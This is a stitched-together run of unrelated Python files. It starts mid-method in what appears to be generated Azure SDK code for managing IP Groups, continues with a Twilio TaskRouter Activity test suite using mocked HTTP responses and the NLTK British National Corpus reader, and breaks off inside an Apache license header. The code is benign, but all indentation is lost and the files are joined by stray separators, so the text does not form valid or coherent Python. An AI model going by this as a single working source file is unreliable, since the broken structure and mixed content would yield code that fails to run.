api_version = "2019-12-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'ipGroupsName': self._serialize.url("ip_groups_name", ip_groups_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'IpGroup')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('IpGroup', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('IpGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ipGroups/{ipGroupsName}'} # type: ignore
def begin_create_or_update(
self,
resource_group_name, # type: str
ip_groups_name, # type: str
parameters, # type: "_models.IpGroup"
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.IpGroup"]
"""Creates or updates an ipGroups in a specified resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param ip_groups_name: The name of the ipGroups.
:type ip_groups_name: str
:param parameters: Parameters supplied to the create or update IpGroups operation.
:type parameters: ~azure.mgmt.network.v2019_12_01.models.IpGroup
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either IpGroup or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2019_12_01.models.IpGroup]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.IpGroup"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
ip_groups_name=ip_groups_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('IpGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'ipGroupsName': self._serialize.url("ip_groups_name", ip_groups_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ipGroups/{ipGroupsName}'} # type: ignore
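    # Usage sketch (the client attribute name below is an assumption, not part
    # of this file):
    #   poller = network_client.ip_groups.begin_create_or_update(
    #       "my-rg", "my-ip-group", ip_group_model)
    #   result = poller.result()  # blocks until the long-running operation completes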
def update_groups(
self,
resource_group_name, # type: str
ip_groups_name, # type: str
parameters, # type: "_models.TagsObject"
**kwargs # type: Any
):
# type: (...) -> "_models.IpGroup"
"""Updates tags of an IpGroups resource.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param ip_groups_name: The name of the ipGroups.
:type ip_groups_name: str
:param parameters: Parameters supplied to the update ipGroups operation.
:type parameters: ~azure.mgmt.network.v2019_12_01.models.TagsObject
:keyword callable cls: A custom type or function that will be passed the direct response
:return: IpGroup, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_12_01.models.IpGroup
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.IpGroup"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-12-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_groups.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'ipGroupsName': self._serialize.url("ip_groups_name", ip_groups_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'TagsObject')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('IpGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_groups.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ipGroups/{ipGroupsName}'} # type: ignore
def _delete_initial(
self,
resource_group_name, # type: str
ip_groups_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-12-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'ipGroupsName': self._serialize.url("ip_groups_name", ip_groups_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ipGroups/{ipGroupsName}'} # type: ignore
def begin_delete(
self,
resource_group_name, # type: str
ip_groups_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Deletes the specified ipGroups.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param ip_groups_name: The name of the ipGroups.
:type ip_groups_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
ip_groups_name=ip_groups_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'ipGroupsName': self._serialize.url("ip_groups_name", ip_groups_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ipGroups/{ipGroupsName}'} # type: ignore
def list_by_resource_group(
self,
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.IpGroupListResult"]
"""Gets all IpGroups in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either IpGroupListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2019_12_01.models.IpGroupListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.IpGroupListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-12-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_resource_group.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('IpGroupListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.Error, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ipGroups'} # type: ignore
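    # Usage sketch (attribute name is an assumption): the returned ItemPaged is
    # lazily iterable, e.g.
    #   for group in network_client.ip_groups.list_by_resource_group("my-rg"):
    #       print(group.name)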
def list(
self,
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.IpGroupListResult"]
"""Gets all IpGroups in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either IpGroupListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2019_12_01.models.IpGroupListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.IpGroupListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-12-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('IpGroupListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.Error, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/ipGroups'} # type: ignore
|
|
# coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from tests import IntegrationTestCase
from tests.holodeck import Request
from twilio.base.exceptions import TwilioException
from twilio.http.response import Response
class ActivityTestCase(IntegrationTestCase):
def test_fetch_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.taskrouter.v1.workspaces(sid="WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.activities(sid="WAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").fetch()
self.holodeck.assert_has_request(Request(
'get',
'https://taskrouter.twilio.com/v1/Workspaces/WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Activities/WAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
))
def test_fetch_response(self):
self.holodeck.mock(Response(
200,
'''
{
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"available": true,
"date_created": "2014-05-14T10:50:02Z",
"date_updated": "2014-05-14T23:26:06Z",
"friendly_name": "New Activity",
"sid": "WAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"url": "https://taskrouter.twilio.com/v1/Workspaces/WSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Activities/WAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"workspace_sid": "WSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
}
'''
))
actual = self.client.taskrouter.v1.workspaces(sid="WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.activities(sid="WAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").fetch()
self.assertIsNotNone(actual)
def test_update_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.taskrouter.v1.workspaces(sid="WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.activities(sid="WAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").update()
self.holodeck.assert_has_request(Request(
'post',
'https://taskrouter.twilio.com/v1/Workspaces/WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Activities/WAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
))
def test_update_response(self):
self.holodeck.mock(Response(
200,
'''
{
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"available": true,
"date_created": "2014-05-14T10:50:02Z",
"date_updated": "2014-05-14T23:26:06Z",
"friendly_name": "New Activity",
"sid": "WAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"url": "https://taskrouter.twilio.com/v1/Workspaces/WSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Activities/WAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"workspace_sid": "WSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
}
'''
))
actual = self.client.taskrouter.v1.workspaces(sid="WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.activities(sid="WAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").update()
self.assertIsNotNone(actual)
def test_delete_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.taskrouter.v1.workspaces(sid="WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.activities(sid="WAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").delete()
self.holodeck.assert_has_request(Request(
'delete',
'https://taskrouter.twilio.com/v1/Workspaces/WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Activities/WAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
))
def test_delete_response(self):
self.holodeck.mock(Response(
204,
None,
))
actual = self.client.taskrouter.v1.workspaces(sid="WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.activities(sid="WAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").delete()
self.assertTrue(actual)
def test_list_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.taskrouter.v1.workspaces(sid="WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.activities.list()
self.holodeck.assert_has_request(Request(
'get',
'https://taskrouter.twilio.com/v1/Workspaces/WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Activities',
))
def test_read_full_response(self):
self.holodeck.mock(Response(
200,
'''
{
"activities": [
{
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"available": true,
"date_created": "2014-05-14T10:50:02Z",
"date_updated": "2014-05-14T23:26:06Z",
"friendly_name": "New Activity",
"sid": "WAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"url": "https://taskrouter.twilio.com/v1/Workspaces/WSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Activities/WAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"workspace_sid": "WSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
}
],
"meta": {
"first_page_url": "https://taskrouter.twilio.com/v1/Workspaces/WSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Activities?PageSize=50&Page=0",
"key": "activities",
"last_page_url": "https://taskrouter.twilio.com/v1/Workspaces/WSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Activities?PageSize=50&Page=0",
"next_page_url": null,
"page": 0,
"page_size": 50,
"previous_page_url": null,
"url": "https://taskrouter.twilio.com/v1/Workspaces/WSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Activities?PageSize=50&Page=0"
}
}
'''
))
actual = self.client.taskrouter.v1.workspaces(sid="WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.activities.list()
self.assertIsNotNone(actual)
def test_read_empty_response(self):
self.holodeck.mock(Response(
200,
'''
{
"activities": [],
"meta": {
"first_page_url": "https://taskrouter.twilio.com/v1/Workspaces/WSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Activities?PageSize=50&Page=0",
"key": "activities",
"last_page_url": "https://taskrouter.twilio.com/v1/Workspaces/WSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Activities?PageSize=50&Page=0",
"next_page_url": null,
"page": 0,
"page_size": 50,
"previous_page_url": null,
"url": "https://taskrouter.twilio.com/v1/Workspaces/WSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Activities?PageSize=50&Page=0"
}
}
'''
))
actual = self.client.taskrouter.v1.workspaces(sid="WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.activities.list()
self.assertIsNotNone(actual)
def test_create_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.taskrouter.v1.workspaces(sid="WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.activities.create(friendly_name="friendly_name")
values = {'FriendlyName': "friendly_name", }
self.holodeck.assert_has_request(Request(
'post',
'https://taskrouter.twilio.com/v1/Workspaces/WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Activities',
data=values,
))
def test_create_response(self):
self.holodeck.mock(Response(
201,
'''
{
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"available": true,
"date_created": "2014-05-14T10:50:02Z",
"date_updated": "2014-05-14T23:26:06Z",
"friendly_name": "New Activity",
"sid": "WAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"url": "https://taskrouter.twilio.com/v1/Workspaces/WSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Activities/WAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"workspace_sid": "WSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
}
'''
))
actual = self.client.taskrouter.v1.workspaces(sid="WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.activities.create(friendly_name="friendly_name")
self.assertIsNotNone(actual)
|
|
# Natural Language Toolkit: British National Corpus (BNC) Corpus Reader
#
# Copyright (C) 2001-2012 NLTK Project
# Author: Edward Loper <[email protected]>
# URL: <http://www.nltk.org/>
# For license information, see LICENSE.TXT
"""
Corpus reader for the XML version of the British National Corpus.
"""
__docformat__ = 'restructuredtext en'
import re
import xml.etree.ElementTree as ET
from api import *
from util import *
from xmldocs import *
class BNCCorpusReader(XMLCorpusReader):
"""
Corpus reader for the XML version of the British National Corpus.
For access to the complete XML data structure, use the ``xml()``
method. For access to simple word lists and tagged word lists, use
``words()``, ``sents()``, ``tagged_words()``, and ``tagged_sents()``.
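    A minimal usage sketch (the corpus root and fileid pattern below are
    illustrative assumptions, not files shipped with NLTK)::

        reader = BNCCorpusReader(root='/path/to/BNC/Texts',
                                 fileids=r'[A-K]/\w*/\w*\.xml')
        reader.words()[:5]                # plain word tokens
        reader.tagged_sents(c5=True)[0]   # one sentence of (word, C5 tag) pairs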
"""
def __init__(self, root, fileids, lazy=True):
XMLCorpusReader.__init__(self, root, fileids)
self._lazy = lazy
def words(self, fileids=None, strip_space=True, stem=False):
"""
:return: the given file(s) as a list of words
and punctuation symbols.
:rtype: list(str)
:param strip_space: If true, then strip trailing spaces from
word tokens. Otherwise, leave the spaces on the tokens.
:param stem: If true, then use word stems instead of word strings.
"""
if self._lazy:
return concat([BNCWordView(fileid, False, None,
strip_space, stem)
for fileid in self.abspaths(fileids)])
else:
return concat([self._words(fileid, False, None,
strip_space, stem)
for fileid in self.abspaths(fileids)])
def tagged_words(self, fileids=None, c5=False, strip_space=True, stem=False):
"""
:return: the given file(s) as a list of tagged
words and punctuation symbols, encoded as tuples
``(word,tag)``.
:rtype: list(tuple(str,str))
:param c5: If true, then the tags used will be the more detailed
c5 tags. Otherwise, the simplified tags will be used.
:param strip_space: If true, then strip trailing spaces from
word tokens. Otherwise, leave the spaces on the tokens.
:param stem: If true, then use word stems instead of word strings.
"""
if c5: tag = 'c5'
else: tag = 'pos'
if self._lazy:
return concat([BNCWordView(fileid, False, tag, strip_space, stem)
for fileid in self.abspaths(fileids)])
else:
return concat([self._words(fileid, False, tag, strip_space, stem)
for fileid in self.abspaths(fileids)])
def sents(self, fileids=None, strip_space=True, stem=False):
"""
:return: the given file(s) as a list of
sentences or utterances, each encoded as a list of word
strings.
:rtype: list(list(str))
:param strip_space: If true, then strip trailing spaces from
word tokens. Otherwise, leave the spaces on the tokens.
:param stem: If true, then use word stems instead of word strings.
"""
if self._lazy:
return concat([BNCWordView(fileid, True, None, strip_space, stem)
for fileid in self.abspaths(fileids)])
else:
return concat([self._words(fileid, True, None, strip_space, stem)
for fileid in self.abspaths(fileids)])
def tagged_sents(self, fileids=None, c5=False, strip_space=True,
stem=False):
"""
:return: the given file(s) as a list of
sentences, each encoded as a list of ``(word,tag)`` tuples.
:rtype: list(list(tuple(str,str)))
:param c5: If true, then the tags used will be the more detailed
c5 tags. Otherwise, the simplified tags will be used.
:param strip_space: If true, then strip trailing spaces from
word tokens. Otherwise, leave the spaces on the tokens.
:param stem: If true, then use word stems instead of word strings.
"""
if c5: tag = 'c5'
else: tag = 'pos'
if self._lazy:
return concat([BNCWordView(fileid, True, tag, strip_space, stem)
for fileid in self.abspaths(fileids)])
else:
return concat([self._words(fileid, True, tag, strip_space, stem)
for fileid in self.abspaths(fileids)])
def _words(self, fileid, bracket_sent, tag, strip_space, stem):
"""
Helper used to implement the view methods -- returns a list of
words or a list of sentences, optionally tagged.
:param fileid: The name of the underlying file.
:param bracket_sent: If true, include sentence bracketing.
:param tag: The name of the tagset to use, or None for no tags.
:param strip_space: If true, strip spaces from word tokens.
:param stem: If true, then substitute stems for words.
"""
result = []
        xmldoc = ET.parse(fileid).getroot()
for xmlsent in xmldoc.findall('.//s'):
sent = []
for xmlword in _all_xmlwords_in(xmlsent):
word = xmlword.text
if not word:
word = "" # fixes issue 337?
if strip_space or stem: word = word.strip()
if stem: word = xmlword.get('hw', word)
if tag == 'c5':
word = (word, xmlword.get('c5'))
elif tag == 'pos':
word = (word, xmlword.get('pos', xmlword.get('c5')))
sent.append(word)
if bracket_sent:
result.append(BNCSentence(xmlsent.attrib['n'], sent))
else:
result.extend(sent)
assert None not in result
return result
def _all_xmlwords_in(elt, result=None):
if result is None: result = []
for child in elt:
if child.tag in ('c', 'w'): result.append(child)
else: _all_xmlwords_in(child, result)
return result
class BNCSentence(list):
"""
A list of words, augmented by an attribute ``num`` used to record
the sentence identifier (the ``n`` attribute from the XML).
"""
def __init__(self, num, items):
self.num = num
list.__init__(self, items)
class BNCWordView(XMLCorpusView):
"""
A stream backed corpus view specialized for use with the BNC corpus.
"""
def __init__(self, fileid, sent, tag, strip_space, stem):
"""
:param fileid: The name of the underlying file.
:param sent: If true, include sentence bracketing.
:param tag: The name of the tagset to use, or None for no tags.
:param strip_space: If true, strip spaces from word tokens.
:param stem: If true, then substitute stems for words.
"""
if sent: tagspec = '.*/s'
else: tagspec = '.*/s/(.*/)?(c|w)'
self._sent = sent
self._tag = tag
self._strip_space = strip_space
self._stem = stem
XMLCorpusView.__init__(self, fileid, tagspec)
# Read in a tasty header.
self._open()
self.read_block(self._stream, '.*/teiHeader$', self.handle_header)
self.close()
# Reset tag context.
self._tag_context = {0: ()}
title = None #: Title of the document.
author = None #: Author of the document.
editor = None #: Editor
resps = None #: Statement of responsibility
def handle_header(self, elt, context):
# Set up some metadata!
titles = elt.findall('titleStmt/title')
if titles: self.title = '\n'.join(
[title.text.strip() for title in titles])
authors = elt.findall('titleStmt/author')
if authors: self.author = '\n'.join(
[author.text.strip() for author in authors])
editors = elt.findall('titleStmt/editor')
if editors: self.editor = '\n'.join(
[editor.text.strip() for editor in editors])
resps = elt.findall('titleStmt/respStmt')
if resps: self.resps = '\n\n'.join([
'\n'.join([resp_elt.text.strip() for resp_elt in resp])
for resp in resps])
def handle_elt(self, elt, context):
if self._sent: return self.handle_sent(elt)
else: return self.handle_word(elt)
def handle_word(self, elt):
word = elt.text
if not word:
word = "" # fixes issue 337?
if self._strip_space or self._stem:
word = word.strip()
if self._stem:
word = elt.get('hw', word)
if self._tag == 'c5':
word = (word, elt.get('c5'))
elif self._tag == 'pos':
word = (word, elt.get('pos', elt.get('c5')))
return word
def handle_sent(self, elt):
sent = []
for child in elt:
if child.tag == 'mw':
sent += [self.handle_word(w) for w in child]
elif child.tag in ('w','c'):
sent.append(self.handle_word(child))
else:
raise ValueError('Unexpected element %s' % child.tag)
return BNCSentence(elt.attrib['n'], sent)
|
|
# Copyright 2012 Nebula Inc
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
